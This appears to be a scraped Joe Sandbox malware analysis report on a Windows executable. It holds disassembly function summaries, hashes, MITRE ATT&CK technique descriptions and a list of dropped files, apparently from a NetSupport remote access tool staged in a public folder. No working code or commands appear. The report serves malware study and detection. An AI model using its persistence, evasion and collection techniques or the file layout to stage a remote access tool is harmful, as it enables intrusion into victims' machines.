Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 819365019-2830328467
Opcode ID: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
Instruction ID: cf35a841ff9db8a25d072bdd62e9da3c8eef3a8b3e547f8f1cf52fd96b7d4918
Opcode Fuzzy Hash: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
Instruction Fuzzy Hash: 3CE04FB570021DABD310CA95DC85ED7B39CEB54354F008429F92887600D6B0F89087A0

Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(?,?,?,?), ref: 11001103

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
m_hWnd, xrefs: 110010E6

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastPostProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 906220102-2830328467
Opcode ID: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
Instruction ID: e326bc5325dc434b8864e09602644acab64ba33727794dfa8c4f249b36814fc9
Opcode Fuzzy Hash: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
Instruction Fuzzy Hash: 81E04FB970025DAFD314CA95DC45ED6B3ACEB54764F008429F92887600DA70F84087A0

Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 1100113B

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
m_hWnd, xrefs: 11001126

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1604732272-2830328467
Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4

Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 1100102B

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
m_hWnd, xrefs: 11001016

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
Instruction ID: d507351e39c60ba8400a42a64aee1b3b281c2e630578985a984e8bb8925e1fd6
Opcode Fuzzy Hash: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390

Function 11143320 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 11143347

Strings

1000,50, xrefs: 11143342
1000,50, xrefs: 11143337, 11143341

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: _strncpy
String ID: 1000,50$1000,50
API String ID: 2961919466-2776873633
Opcode ID: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
Instruction ID: bd0c201b9adf6a5d857793fbf3440ac1f90bcd045974f847078f01ed738f2ada
Opcode Fuzzy Hash: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351

Function 1110F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

this->hReadyEvent, xrefs: 1110F353
..\ctl32\Refcount.cpp, xrefs: 1110F34E

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ErrorEventExitLastMessageProcesswsprintf
String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
API String ID: 2400454052-4183089485
Opcode ID: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
Instruction ID: 9b03986313e8994d60ed52ed66d1c026156e8c3194449c112131b18896cf505e
Opcode Fuzzy Hash: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Netstat\HTCTL32.DLL

C:\Users\Public\Netstat\NSM.LIC

C:\Users\Public\Netstat\PCICHEK.DLL

C:\Users\Public\Netstat\PCICL32.DLL

C:\Users\Public\Netstat\TCCTL32.DLL

C:\Users\Public\Netstat\bild.exe

C:\Users\Public\Netstat\client32.ini

C:\Users\Public\Netstat\msvcr100.dll

C:\Users\Public\Netstat\netsup.bat

C:\Users\Public\Netstat\nskbfltr.inf

C:\Users\Public\Netstat\pcicapi.dll

C:\Users\Public\Netstat\remcmdstub.exe

Static File Info

Windows Analysis Report
d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Function 003DC131 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 199
filesleeptimeCOMMON

Function 003D8BD0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92
memorywindowCOMMON

Function 003CA273 Relevance: 7.6, APIs: 5, Instructions: 108
fileCOMMON

Function 003CF353 Relevance: 77.3, APIs: 22, Strings: 22, Instructions: 314
libraryfileloaderCOMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

